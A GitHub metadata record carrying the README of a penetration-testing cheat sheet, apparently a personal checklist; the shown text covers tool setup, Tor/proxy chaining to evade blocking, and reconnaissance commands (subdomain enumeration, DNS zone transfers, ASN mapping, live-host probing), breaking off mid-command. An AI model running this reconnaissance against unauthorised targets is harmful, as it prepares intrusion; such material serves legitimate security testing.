{"id":13404967,"url":"https://github.com/ivan-sincek/penetration-testing-cheat-sheet","last_synced_at":"2025-02-27T23:45:40.664Z","repository":{"id":41348171,"uuid":"212625433","full_name":"ivan-sincek/penetration-testing-cheat-sheet","owner":"ivan-sincek","description":"Work in progress...","archived":false,"fork":false,"pushed_at":"2025-02-03T08:42:41.000Z","size":1615,"stargazers_count":680,"open_issues_count":0,"forks_count":140,"subscribers_count":24,"default_branch":"master","last_synced_at":"2025-02-03T09:36:27.568Z","etag":null,"topics":["bug-bounty","ethical-hacking","offensive-security","penetration-testing","red-team-engagement","security","web","web-penetration-testing"],"latest_commit_sha":null,"homepage":"","language":"PHP","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ivan-sincek.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2019-10-03T16:23:11.000Z","updated_at":"2025-02-03T08:42:46.000Z","dependencies_parsed_at":"2024-05-21T21:29:24.347Z","dependency_job_id":"6a40871e-7e87-48e9-97ea-ebfa2161c613","html_url":"https://github.com/ivan-sincek/penetration-testing-cheat-sheet","commit_stats":{"total_commits":9,"total_committers":1,"mean_commits":9.0,"dds":0.0,"last_synced_commit":"ee66106a9d99c1db3c1c915dda2edc2d4c4519dc"},"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ivan-sincek%2Fpenetration-testing-cheat-sheet","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ivan-sincek%2Fpenetration-testing-cheat-sheet/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ivan-sincek%2Fpenetration-testing-cheat-sheet/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ivan-sincek%2Fpenetration-testing-cheat-sheet/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ivan-sincek","download_url":"https://codeload.github.com/ivan-sincek/penetration-testing-cheat-sheet/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":241076997,"owners_count":19905704,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bug-bounty","ethical-hacking","offensive-security","penetration-testing","red-team-engagement","security","web","web-penetration-testing"],"created_at":"2024-07-30T19:01:53.891Z","updated_at":"2025-02-27T23:45:40.637Z","avatar_url":"https://github.com/ivan-sincek.png","language":"PHP","funding_links":[],"categories":["PHP","ASP.NET","ASP.NET (1)","HarmonyOS","Pentesting"],"sub_categories":["Windows Manager","ARM"],"readme":"# Penetration Testing Cheat Sheet\n\nThis is more of a checklist for myself. May contain useful tips and tricks.\n\nEverything was tested on Kali Linux v2023.1 (64-bit).\n\nFor help with any of the tools write `\u003ctool_name\u003e [-h | -hh | --help]` or `man \u003ctool_name\u003e`.\n\nSometimes `-h` can be mistaken for a host or some other option. If that's the case, use `-hh` or `--help` instead, or read the manual with `man`.\n\nSome tools do similar tasks, but get slightly different results. Run everything you can. Many tools also complement each other!\n\nKeep in mind when no protocol nor port number in a URL is specified, i.e., if you specify only `somesite.com`, some tools will default to HTTP protocol and port 80.\n\nIf you didn't already, read [OWASP Web Security Testing Guide](https://github.com/OWASP/wstg). Checklist can be downloaded [here](https://github.com/OWASP/wstg/tree/master/checklists).\n\nHighly recommend reading [Common Security Issues in Financially-Orientated Web](https://soroush.me/downloadable/common-security-issues-in-financially-orientated-web-applications.pdf).\n\nHighly recommend doing [PortSwigger Web Security Academy](https://portswigger.net/web-security/all-labs), very underrated and super cheap.\n\nWebsites that you should use while writing the report:\n\n* [cwe.mitre.org/data](https://cwe.mitre.org/data)\n* [owasp.org/projects](https://owasp.org/projects)\n* [owasp.org/www-project-top-ten](https://owasp.org/www-project-top-ten)\n* [cheatsheetseries.owasp.org](https://cheatsheetseries.owasp.org/Glossary.html)\n* [first.org/cvss/calculator/4.0](https://www.first.org/cvss/calculator/4.0)\n* [nvd.nist.gov/ncp/repository](https://nvd.nist.gov/ncp/repository)\n* [attack.mitre.org](https://attack.mitre.org)\n\nMy other cheat sheets:\n\n* [WiFi Penetration Testing Cheat Sheet](https://github.com/ivan-sincek/wifi-penetration-testing-cheat-sheet)\n* [iOS Penetration Testing Cheat Sheet](https://github.com/ivan-sincek/ios-penetration-testing-cheat-sheet)\n* [Android Testing Cheat Sheet](https://github.com/ivan-sincek/android-penetration-testing-cheat-sheet)\n\n## Table of Contents\n\n**0. [Install Tools and Setup](#0-install-tools-and-setup)**\n\n* [API Keys](#api-keys)\n* [User-Agents](#user-agents)\n* [DNS Resolvers](#dns-resolvers)\n* [ProxyChains-NG](#proxychains-ng)\n\n**1. [Reconnaissance](#1-reconnaissance)**\n\n* [Useful Websites](#11-useful-websites)\n* [Dmitry](#dmitry)\n* [theHarvester](#theharvester)\n* [FOCA](#foca-fingerprinting-organizations-with-collected-archives)\n* [uncover](#uncover)\n* [assetfinder](#assetfinder)\n* [Sublist3r](#sublist3r)\n* [Subfinder](#subfinder)\n* [Amass](#amass)\n* [dig](#dig)\n* [Fierce](#fierce)\n* [DNSRecon](#dnsrecon)\n* [host](#host)\n* [WHOIS, ASN, CIDR](#whois-asn-cidr)\n* [ASNmap](#asnmap)\n* [httpx](#httpx)\n* [gau](#gau)\n* [urlhunter](#urlhunter)\n* [Google Dorks](#google-dorks)\n* [Chad](#chad)\n* [PhoneInfoga](#phoneinfoga)\n* [git-dumper](#git-dumper)\n* [TruffleHog](#trufflehog)\n* [File Scraper](#file-scraper)\n* [katana](#katana)\n* [Scrapy Scraper](#scrapy-scraper)\n* [Directory Fuzzing](#directory-fuzzing)\n* [DirBuster](#dirbuster)\n* [feroxbuster](#feroxbuster)\n* [snallygaster](#snallygaster)\n* [IIS Tilde Short name Scanning](#iis-tilde-short-name-scanning)\n* [WhatWeb](#whatweb)\n* [Parsero](#parsero)\n* [EyeWitness](#eyewitness)\n* [Wordlists](#wordlists)\n\n**2. [Scanning/Enumeration](#2-scanningenumeration)**\n\n* [Useful Websites](#21-useful-websites)\n* [Nmap](#nmap)\n* [testssl.sh](#testsslsh)\n* [OpenSSL](#openssl)\n* [keytool](#keytool)\n\n**3. [Vulnerability Assesment/Exploiting](#3-vulnerability-assesmentexploiting)**\n\n* [Useful Websites](#31-useful-websites)\n* [Collaborator Servers](#collaborator-servers)\n* [Subdomain Takeover](#subdomain-takeover)\n* [Subzy](#subzy)\n* [subjack](#subjack)\n* [Bypassing the 401 and 403](#bypassing-the-401-and-403)\n* [Nikto](#nikto)\n* [WPScan](#wpscan)\n* [Nuclei](#Nuclei)\n* [Arjun](#arjun)\n* [WFUZZ](#wfuzz)\n* [Insecure Direct Object Reference (IDOR)](#insecure-direct-object-reference-idor)\n* [HTTP Response Splitting](#http-response-splitting)\n* [Cross-Site Scripting \\(XSS\\)](#cross-site-scripting-xss)\n* [SQL Injection](#sql-injection)\n* [sqlmap](#sqlmap)\n* [dotdotpwn](#dotdotpwn)\n* [Web Shells](#web-shells)\n* [Send a Payload With Python](#send-a-payload-with-python)\n\n**4. [Post Exploitation](#4-post-exploitation)**\n\n* [Useful Websites](#41-useful-websites)\n* [Generate a Reverse Shell Payload for Windows OS](#generate-a-reverse-shell-payload-for-windows-os)\n* [PowerShell Encoded Command](#powershell-encoded-command)\n\n**5. [Password Cracking](#5-password-cracking)**\n\n* [Useful Websites](#51-useful-websites)\n* [crunch](#crunch)\n* [hash-identifier](#hash-identifier)\n* [Hashcat](#hashcat)\n* [Cracking the JWT](#cracking-the-jwt)\n* [Hydra](#hydra)\n* [Password Spraying](#password-spraying)\n\n**6. [Social Engineering](#6-social-engineering)**\n\n* [Drive-by Download](#drive-by-download)\n* [Phishing Website](#phishing-website)\n\n**7. [Miscellaneous](#7-miscellaneous)**\n\n* [Useful Websites](#71-useful-websites)\n* [cURL](#curl)\n* [Ncat](#ncat)\n* [multi/handler](#multihandler)\n* [ngrok](#ngrok)\n* [Additional References](#additional-references)\n\n## 0. Install Tools and Setup\n\nMost tools can be installed with the Linux package manager:\n\n```bash\napt-get update \u0026\u0026 apt-get -y install sometool\n```\n\nFor more information visit [kali.org/tools](https://www.kali.org/tools).\n\n---\n\nSome Python tools need to be downloaded and installed manually:\n\n```fundamental\npython3 setup.py install\n```\n\nOr, installed from the [PyPi](https://pypi.org):\n\n```fundamental\npip3 install sometool\n\npython3 -m pip install sometool\n```\n\n---\n\nSome Golang tools need to be downloaded and built manually:\n\n```fundamental\ngo build sometool.go\n```\n\nOr, installed directly:\n\n```fundamental\ngo install -v github.com/user/sometool@latest\n```\n\nFor more information visit [pkg.go.dev](https://pkg.go.dev).\n\nTo set up Golang, run:\n\n```bash\napt-get -y install golang\n\necho \"export GOROOT=/usr/lib/go\" \u003e\u003e ~/.zshrc\necho \"export GOPATH=$HOME/go\" \u003e\u003e ~/.zshrc\necho \"export PATH=$GOPATH/bin:$GOROOT/bin:$PATH\" \u003e\u003e ~/.zshrc\n\nsource ~/.zshrc\n```\n\nIf you use other console, you might need to write to `~/.bashrc`, etc.\n\n---\n\nSome tools that are in the form of binaries or shell scripts can be moved to `/usr/bin/` directory for the ease of use:\n\n```bash\nmv sometool.sh /usr/bin/sometool \u0026\u0026 chmod +x /usr/bin/sometool\n```\n\n---\n\nSome Java tools need to be downloaded and ran manually with Java (JRE):\n\n```fundamental\njava -jar sometool.jar\n```\n\n### API Keys\n\nList of useful APIs to integrate in your tools:\n\n* [scrapeops.io](https://scrapeops.io) - bot-safe User-Agents\n* [shodan.io](https://developer.shodan.io) - IoT search engine and more\n* [censys.io](https://search.censys.io/api) - domain lookup and more\n* [github.com](https://github.com/settings/tokens) - public source code repository lookup\n* [virustotal.com](https://developers.virustotal.com/reference/overview) - malware database lookup\n* [cloud.projectdiscovery.io](https://cloud.projectdiscovery.io) - ProjectDiscovery tools\n\n### User-Agents\n\nDownload a list of bot-safe User-Agents, requires [scrapeops.io](https://scrapeops.io) API key:\n\n```python\npython3 -c 'import json, requests; open(\"./user_agents.txt\", \"w\").write((\"\\n\").join(requests.get(\"http://headers.scrapeops.io/v1/user-agents?api_key=SCRAPEOPS_API_KEY\u0026num_results=100\", verify = False).json()[\"result\"]))'\n```\n\n### DNS Resolvers\n\nDownload a list of trusted DNS resolvers, or manually from [trickest/resolvers](https://github.com/trickest/resolvers):\n\n```python\npython3 -c 'import json, requests; open(\"./resolvers.txt\", \"w\").write(requests.get(\"https://raw.githubusercontent.com/trickest/resolvers/main/resolvers-trusted.txt\", verify = False).text)'\n```\n\n### ProxyChains-NG\n\nIf Google or any other search engine or service blocks your tool, use ProxyChains-NG and Tor to bypass the restriction.\n\nInstallation:\n\n```bash\napt-get update \u0026\u0026 apt-get -y install proxychains4 tor torbrowser-launcher\n```\n\nDo the following changes in `/etc/proxychains4.conf`:\n\n```fundamental\nround_robin\nchain_len = 1\nproxy_dns\nremote_dns_subnet 224\ntcp_read_time_out 15000\ntcp_connect_time_out 8000\n[ProxyList]\nsocks5 127.0.0.1 9050\n```\n\nMake sure to comment any chain type other than `round_robin` - e.g., comment `strict_chain` into `# strict_chain`.\n\nStart Tor:\n\n```fundamental\nservice tor start\n```\n\nThen, run any tool you want:\n\n```fundamental\nproxychains4 sometool\n```\n\nUsing only Tor most likely won't be enough, you will need to add more proxies \\([1](https://geonode.com/free-proxy-list)\\)\\([2](https://proxyscrape.com/home)\\) to `/etc/proxychains4.conf`; however, it is hard to find free and stable proxies that are not already blacklisted.\n\nDownload a list of free proxies:\n\n```bash\ncurl -s 'https://proxylist.geonode.com/api/proxy-list?limit=50\u0026page=1\u0026sort_by=lastChecked\u0026sort_type=desc' -H 'Referer: https://proxylist.geonode.com/' | jq -r '.data[] | \"\\(.protocols[]) \\(.ip) \\(.port)\"' \u003e proxychains.txt\n\ncurl -s 'https://proxylist.geonode.com/api/proxy-list?limit=50\u0026page=1\u0026sort_by=lastChecked\u0026sort_type=desc' -H 'Referer: https://proxylist.geonode.com/' | jq -r '.data[] | \"\\(.protocols[])://\\(.ip):\\(.port)\"' \u003e proxies.txt\n```\n\n## 1. Reconnaissance\n\nKeep in mind that some \\[legacy\\] websites might only be accessible through specific web browsers such as Internet Explorer or Edge.\n\nKeep in mind that some websites may be missing the index page and may not redirect you to the real home page. If that's the case, try to manually guess a full path to the home page, use [wayback machine](https://archive.org) or [gau](#gau) to find old URLs, or try directory fuzzing with [Feroxbuster](#feroxbuster) or [DirBuster](#dirbuster).\n\nSearch the Internet for default / pre-defined paths and files for a specific web application. Use the gathered information in combination with [Google Dorks](#google-dorks), [Chad](#chad), and [httpx](#httpx) to find the same paths and files on different domains. For not so common web applications, try to find and browse the source code for default / pre-defined paths and files.\n\nYou can find the application's source code on [GitHub](https://github.com), [GitLab](https://about.gitlab.com), [searchcode](https://searchcode.com), etc.\n\nSearch the application's source code for API keys, credentials, secrets, tokens, hosts, etc., with [TruffleHog](#trufflehog) and [File Scraper](#file-scraper). Don't forget to check old GitHub commits for old but still active API keys, credentials, secrets, tokens, etc.\n\nInspect the web console for possible errors. Inspect the application's source code for possible comments.\n\n**Don't forget to access the web server over an IP address because you might find server's default welcome page or some other content.**\n\n### 1.1 Useful Websites\n\n* [whois.domaintools.com](https://whois.domaintools.com)\n* [otx.alienvault.com](https://otx.alienvault.com) - domain lookup\n* [reverseip.domaintools.com](https://reverseip.domaintools.com) - web-based reverse IP lookup\n* [lookup.icann.org](https://lookup.icann.org)\n* [sitereport.netcraft.com](https://sitereport.netcraft.com)\n* [searchdns.netcraft.com](https://searchdns.netcraft.com) - web-based DNS lookup\n* [search.censys.io](https://search.censys.io) - domain lookup and more\n* [crt.sh](https://crt.sh) - certificate fingerprinting\n* [commoncrawl.org](https://commoncrawl.org/get-started) - web crawl dumps\n* [opendata.rapid7.com](https://opendata.rapid7.com) - scan dumps\n* [searchcode.com](https://searchcode.com)\n* [virustotal.com](https://www.virustotal.com/gui/home/search) - malware database lookup\n* [haveibeenpwned.com](https://haveibeenpwned.com)\n* [intelx.io](https://intelx.io) - database breaches\n* [search.wikileaks.org](https://search.wikileaks.org)\n* [archive.org](https://archive.org) - wayback machine\n* [pgp.circl.lu](https://pgp.circl.lu) - OpenPGP key server\n* [shodan.io](https://www.shodan.io) - IoT search engine\n* [sherlockeye.io](https://sherlockeye.io) - account lookup\n* [whoisds.com](https://www.whoisds.com/newly-registered-domains) - newly registered domains\n* [radar.cloudflare.com](https://radar.cloudflare.com) - website lookup and more\n\n### Dmitry\n\nGather information:\n\n```fundamental\ndmitry -wines -o dmitry_results.txt somedomain.com\n```\n\nDeprecated. Netcraft search does not work.\n\n### theHarvester\n\nGather information:\n\n```fundamental\ntheHarvester -f theharvester_results.json -b baidu,bing,bingapi,certspotter,crtsh,dnsdumpster,duckduckgo,hackertarget,otx,threatminer,urlscan,yahoo -l 500 -d somedomain.com\n```\n\nThis tool is changing the search engines quite often, as such, some of them might not work as of this reading.\n\nSometimes the output file might default to `/usr/lib/python3/dist-packages/theHarvester/` directory.\n\nExtract hostnames from the results:\n\n```bash\njq '.hosts[]' theharvester_results.json | sort -uf | tee -a subdomains.txt\n```\n\nExtract IPs from the results:\n\n```bash\njq '.ips[]' theharvester_results.json | sort -uf | tee -a ips.txt\n```\n\nExtract emails from the results:\n\n```bash\njq '.emails[]' theharvester_results.json | sort -uf | tee -a emails.txt\n```\n\nExtract emails from the results:\n\n```bash\njq '.asns[]' theharvester_results.json | sort -uf | tee -a asns.txt\n```\n\n### FOCA (Fingerprinting Organizations with Collected Archives)\n\nFind metadata and hidden information in files.\n\nTested on Windows 10 Enterprise OS (64-bit).\n\nMinimum requirements:\n\n* download and install [MS SQL Server 2014 Express](https://www.microsoft.com/en-us/download/details.aspx?id=42299) or greater,\n* download and install [MS .NET Framework 4.7.1 Runtime](https://dotnet.microsoft.com/download/dotnet-framework/net471) or greater,\n* download and install [MS Visual C++ 2010 (64-bit)](https://www.microsoft.com/en-us/download/developer-tools.aspx) or greater,\n* download and install [FOCA](https://github.com/ElevenPaths/FOCA/releases).\n\nGUI is very intuitive.\n\n### uncover\n\nInstallation:\n\n```fundamental\ngo install -v github.com/projectdiscovery/uncover/cmd/uncover@latest\n```\n\nSet your API keys in `/root/.config/uncover/provider-config.yaml` as following:\n\n```fundamental\nshodan:\n  - SHODAN_API_KEY\ncensys:\n  - CENSYS_API_ID:CENSYS_API_SECRET\n```\n\nGather information using Shodan, Censys, and more:\n\n```bash\nuncover -json -o uncover_results.json -l 100 -e shodan,censys -q somedomain.com\n\njq -r '.host // empty' uncover_results.json | sort -uf | tee -a subdomains.txt\n\njq -r '.ip // empty' uncover_results.json | sort -uf | tee -a ips.txt\n```\n\nTO DO: More Shodan and Censys Dorks.\n\n### assetfinder\n\nGather subdomains using OSINT:\n\n```bash\nassetfinder --subs-only somedomain.com | grep -v '*' | tee assetfinder_results.txt\n```\n\n### Sublist3r\n\nGather subdomains using OSINT:\n\n```fundamental\nsublist3r -o sublister_results.txt -d somedomain.com\n```\n\n### Subfinder\n\nInstallation:\n\n```fundamental\ngo install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest\n```\n\nGather subdomains using OSINT:\n\n```fundamental\nsubfinder -t 10 -timeout 3 -nW -o subfinder_results.txt -rL resolvers.txt -d somedomain.com\n```\n\n**Subfinder has built-in DNS resolvers.**\n\nSet your API keys in `/root/.config/subfinder/config.yaml` file as following:\n\n```fundamental\nshodan:\n  - SHODAN_API_KEY\ncensys:\n  - CENSYS_API_ID:CENSYS_API_SECRET\ngithub:\n  - GITHUB_API_KEY\nvirustotal:\n  - VIRUSTOTAL_API_KEY\n```\n\n### Amass\n\nGather subdomains using OSINT:\n\n```fundamental\namass enum -o amass_results.txt -trf resolvers.txt -d somedomain.com\n```\n\n**Amass has built-in DNS resolvers.**\n\nTo find ASNs from IPs and CIDRs from ASNs, use [WHOIS](#whois-asn-cidr). The below ASN and CIDR scans will take a long time to finish. **The results might not be all within your scope allowed by the client!**\n\nGather subdomains from [ASN](https://www.arin.net/resources/guide/asn):\n\n```fundamental\namass intel -o amass_asn_results.txt -trf resolvers.txt -asn 13337\n```\n\nGather subdomains from [CIDR](https://aws.amazon.com/what-is/cidr):\n\n```fundamental\namass intel -o amass_cidr_results.txt -trf resolvers.txt -cidr 192.168.8.0/24\n```\n\n### dig\n\nFetch name servers:\n\n```fundamental\ndig +noall +answer -t NS somedomain.com\n```\n\nFetch exchange servers:\n\n```fundamental\ndig +noall +answer -t MX somedomain.com\n```\n\nInterrogate a domain name server:\n\n```fundamental\ndig +noall +answer -t ANY somedomain.com @ns.somedomain.com\n```\n\nFetch the zone file from a domain name server:\n\n```fundamental\ndig +noall +answer -t AXFR somedomain.com @ns.somedomain.com\n```\n\nReverse IP lookup:\n\n```fundamental\ndig +noall +answer -x 192.168.8.5\n```\n\n\\[Subdomain Takeover\\] Check if domains/subdomains are dead, look for `NXDOMAIN`, `SERVFAIL`, or `REFUSED` status codes:\n\n```bash\nfor subdomain in $(cat subdomains.txt); do res=$(dig \"${subdomain}\" -t A +noall +comments +timeout=3 | grep -Po '(?\u003c=status\\:\\ )[^\\s]+(?\u003c!\\,)'); echo \"${subdomain} | ${res}\"; done | sort -uf | tee -a subdomains_to_status.txt\n\ngrep -v 'NOERROR' subdomains_to_status.txt | grep -Po '[^\\s]+(?=\\ \\|)' | sort -uf | tee -a subdomains_errors.txt\n\ngrep 'NOERROR' subdomains_to_status.txt | grep -Po '[^\\s]+(?=\\ \\|)' | sort -uf | tee -a subdomains_errors_none.txt\n```\n\nSee [host](#host) tool for the next step.\n\n### Fierce\n\nInterrogate domain name servers:\n\n```fundamental\nfierce -file fierce_std_results.txt --domain somedomain.com\n\nfierce -file fierce_brt_results.txt --subdomain-file subdomains-top1mil.txt --domain somedomain.com\n```\n\n**By default, Fierce will perform dictionary attack with its built-in wordlist.**\n\n### DNSRecon\n\nInterrogate domain name servers:\n\n```fundamental\ndnsrecon -t std --json /root/Desktop/dnsrecon_std_results.json -d somedomain.com\n\ndnsrecon -t axfr --json /root/Desktop/dnsrecon_axfr_results.json -d somedomain.com\n\ndnsrecon -v --iw -f --lifetime 3 --threads 50 -t brt --json /root/Desktop/dnsrecon_brt_results.json -D subdomains-top1mil.txt -d somedomain.com\n```\n\nDNSRecon can perform a dictionary attack with a user-defined wordlist, but make sure to specify a full path to the wordlist; otherwise, DNSRecon might not recognize it.\n\nMake sure to specify a full path to the output file; otherwise, it will default to `/usr/share/dnsrecon/` directory, i.e., to the root directory.\n\nExtract hostnames from the standard/zone transfer/brute force results:\n\n```bash\njq -r '.[] | select(.type | test(\"^A$|^CNAME$|^MX$|^NS$|^PTR$\")) | .exchange // empty, .name // empty, .target // empty' dnsrecon_std_results.json | sort -uf | tee -a subdomains.txt\n```\n\nExtract IPs from the standard/zone transfer/brute force results:\n\n```bash\njq -r '.[] | select(.type | test(\"^A$|^CNAME$|^MX$|^NS$|^PTR$\")) | .address // empty' dnsrecon_std_results.json | sort -uf | tee -a ips.txt\n```\n\n\\[Subdomain Takeover\\] Extract canonical names from the standard/zone transfer/brute force results:\n\n```bash\njq -r '.[] | select(.type | test(\"^CNAME$\")).target' dnsrecon_std_results.json | sort -uf | tee -a cnames.txt\n```\n\nReverse IP lookup:\n\n```fundamental\ndnsrecon --json /root/Desktop/dnsrecon_reverse_results.json -s -r 192.168.8.0/24\n```\n\nExtract virtual hosts from the reverse IP lookup results:\n\n```bash\njq -r '.[] | if type == \"array\" then .[].name else empty end' dnsrecon_ptr_results.json | sort -uf | tee -a subdomains.txt\n```\n\n### host\n\n**Some DNS servers will not respond to DNS quieries of type 'ANY', use type 'A' instead.**\n\nGather IPs for the given domains/subdomains (ask for `A` records):\n\n```bash\nfor subdomain in $(cat subdomains.txt); do res=$(host -t A \"${subdomain}\" | grep -Po '(?\u003c=has\\ address\\ )[^\\s]+(?\u003c!\\.)'); if [[ ! -z $res ]]; then echo \"${subdomain} | ${res//$'\\n'/ | }\"; fi; done | sort -uf | tee -a subdomains_to_ips.txt\n\ngrep -Po '(?\u003c=\\|\\ )[^\\s]+' subdomains_to_ips.txt | sort -uf | tee -a ips.txt\n```\n\nCheck if domains/subdomains are alive with [httpx](#httpx). Check if IPs are alive with [Nmap](#nmap) doing the ping sweep.\n\nGather virtual hosts for the given IPs (ask for `PTR` records):\n\n```bash\nfor ip in $(cat ips.txt); do res=$(host -t PTR \"${ip}\" | grep -Po '(?\u003c=domain\\ name\\ pointer\\ )[^\\s]+(?\u003c!\\.)'); if [[ ! -z $res ]]; then echo \"${ip} | ${res//$'\\n'/ | }\"; fi; done | sort -uf | tee -a ips_to_subdomains.txt\n\ngrep -Po '(?\u003c=\\|\\ )[^\\s]+' ips_to_subdomains.txt | sort -uf | tee -a subdomains.txt\n```\n\n\\[Subdomain Takeover\\] Gather canonical names for the given error domains/subdomains (ask for `CNAME` records):\n\n```bash\nfor subdomain in $(cat subdomains_errors.txt); do res=$(host -t CNAMES \"${subdomain}\" | grep -Po '(?\u003c=is\\ an\\ alias\\ for\\ )[^\\s]+(?\u003c!\\.)'); if [[ ! -z $res ]]; then echo \"${subdomain} | ${res//$'\\n'/ | }\"; fi; done | sort -uf | tee -a subdomains_errors_to_cnames.txt\n\ngrep -Po '(?\u003c=\\|\\ )[^\\s]+' subdomains_errors_to_cnames.txt | sort -uf | tee -a subdomain_takeover.txt\n```\n\n### WHOIS, ASN, CIDR\n\nGather [ASNs](https://www.arin.net/resources/guide/asn) from IPs:\n\n```bash\nfor ip in $(cat ips.txt); do res=$(whois -h whois.cymru.com \"${ip}\" | grep -Poi '^\\d+'); if [[ ! -z $res ]]; then echo \"${ip} | ${res//$'\\n'/ | }\"; fi; done | sort -uf | tee -a ips_to_asns.txt\n\ngrep -Po '(?\u003c=\\|\\ )(?(?!\\ \\|).)+' ips_to_asns.txt | sort -uf | tee -a asns.txt\n```\n\nGather [CIDRs](https://www.arin.net/resources/guide/asn) from ASNs:\n\n```bash\nfor asn in $(cat asns.txt); do res=$(whois -h whois.radb.net -i origin \"AS${asn}\" | grep -Poi '(?\u003c=route\\:)[\\s]+\\K.+'); if [[ ! -z $res ]]; then echo \"AS${asn} | ${res//$'\\n'/ | }\"; fi; done | sort -uf | tee -a asns_to_cidrs.txt\n\ngrep -Po '(?\u003c=\\|\\ )(?(?!\\ \\|).)+' asns_to_cidrs.txt | sort -uf | tee -a cidrs.txt\n```\n\n\\[Subdomain Takeover\\] Gather organization names from IPs:\n\n```bash\nfor ip in $(cat ips.txt); do res=$(whois -h whois.arin.net \"${ip}\" | grep -Po '(?\u003c=OrgName\\:)[\\s]+\\K.+'); if [[ ! -z $res ]]; then echo \"${ip} | ${res//$'\\n'/ | }\"; fi; done | sort -uf | tee -a ips_to_organization_names.txt\n\ngrep -Po '(?\u003c=\\|\\ )(?(?!\\ \\|).)+' ips_to_organization_names.txt | sort -uf | tee -a organization_names.txt\n```\n\nCheck if any IP belongs to [GitHub](https://github.com) organization, read more about GitHub takeover in this [H1 article](https://www.hackerone.com/application-security/guide-subdomain-takeovers).\n\n### ASNmap\n\nInstallation:\n\n```fundamental\ngo install -v github.com/projectdiscovery/asnmap/cmd/asnmap@latest\n```\n\nGet the ProjectDiscovery API key from [cloud.projectdiscovery.io](https://cloud.projectdiscovery.io) and run:\n\n```fundamental\nasnmap -auth\n```\n\nGather [CIDRs](https://www.arin.net/resources/guide/asn) from ASN:\n\n```bash\nasnmap -r resolvers.txt -a asn | tee -a asnmap_cidr_results.txt\n```\n\nGather [CIDRs](https://www.arin.net/resources/guide/asn) from organization ID:\n\n```bash\nasnmap -r resolvers.txt -org id | tee -a asnmap_cidr_results.txt\n```\n\n### httpx\n\nCheck if domains/subdomains are alive, map live hosts:\n\n```bash\nhttpx-toolkit -o httpx_results.txt -l subdomains_errors_none.txt\n\nhttpx-toolkit -random-agent -json -o httpx_results.json -threads 100 -timeout 3 -l subdomains_errors_none.txt -ports 80,443,8008,8080,8403,8443,9008,9080,9403,9443\n```\n\nFilter out domains/subdomains from the JSON results:\n\n```bash\njq -r 'select(.\"status-code\" | tostring | test(\"^2|^3|^4\")).url' httpx_results.json | sort -uf | tee -a subdomains_live_long.txt\n\njq -r 'select(.\"status-code\" | tostring | test(\"^2\")).url' httpx_results.json | sort -uf | tee -a subdomains_live_long_2xx.txt\n\njq -r 'select(.\"status-code\" | tostring | test(\"^2|^4\")).url' httpx_results.json | sort -uf | tee -a subdomains_live_long_2xx_4xx.txt\n\njq -r 'select(.\"status-code\" | tostring | test(\"^3\")).url' httpx_results.json | sort -uf | tee -a subdomains_live_long_3xx.txt\n\njq -r 'select(.\"status-code\" | tostring | test(\"^401$\")).url' httpx_results.json | sort -uf | tee -a subdomains_live_long_401.txt\n\njq -r 'select(.\"status-code\" | tostring | test(\"^403$\")).url' httpx_results.json | sort -uf | tee -a subdomains_live_long_403.txt\n\njq -r 'select(.\"status-code\" | tostring | test(\"^4\")).url' httpx_results.json | sort -uf | tee -a subdomains_live_long_4xx.txt\n\njq -r 'select(.\"status-code\" | tostring | test(\"^5\")).url' httpx_results.json | sort -uf | tee -a subdomains_live_long_5xx.txt\n\ngrep -Po 'http\\:\\/\\/[^\\s]+' subdomains_live_long.txt | sort -uf | tee -a subdomains_live_long_http.txt\n\ngrep -Po 'https\\:\\/\\/[^\\s]+' subdomains_live_long.txt | sort -uf | tee -a subdomains_live_long_https.txt\n\ngrep -Po '(?\u003c=\\:\\/\\/)[^\\s]+' subdomains_live_long.txt | sort -uf | tee -a subdomains_live_short.txt\n\ngrep -Po '(?\u003c=http\\:\\/\\/)[^\\s]+' subdomains_live_long.txt | sort -uf | tee -a subdomains_live_short_http.txt\n\ngrep -Po '(?\u003c=https\\:\\/\\/)[^\\s]+' subdomains_live_long.txt | sort -uf | tee -a subdomains_live_short_https.txt\n\ngrep -Po '(?\u003c=\\:\\/\\/)[^\\s\\:]+' subdomains_live_long.txt | sort -uf | tee -a subdomains_live.txt\n```\n\nCheck if a directory exists on a web server:\n\n```bash\nhttpx-toolkit -status-code -content-length -o httpx_results.txt -l subdomains_live_long.txt -path /.git\n```\n\n### gau\n\nGather URLs from the [wayback machine](https://archive.org):\n\n```bash\ngetallurls somedomain.com | tee gau_results.txt\n\nfor subdomain in $(cat subdomains_live.txt); do getallurls \"${subdomain}\"; done | sort -uf | tee gau_results.txt\n```\n\nFilter out URLs from the results:\n\n```bash\nhttpx-toolkit -random-agent -json -o httpx_gau_results.json -threads 100 -timeout 3 -r resolvers.txt -l gau_results.txt\n\njq -r 'select(.\"status-code\" | tostring | test(\"^2|^3|^4\")).url' httpx_gau_results.json | sort -uf | tee gau_2xx_results.txt\n\njq -r 'select(.\"status-code\" | tostring | test(\"^3\")).url' httpx_gau_results.json | sort -uf | tee gau_3xx_results.txt\n\njq -r 'select(.\"status-code\" | tostring | test(\"^401$\")).url' httpx_gau_results.json | sort -uf | tee gau_401_results.txt\n\njq -r 'select(.\"status-code\" | tostring | test(\"^403$\")).url' httpx_gau_results.json | sort -uf | 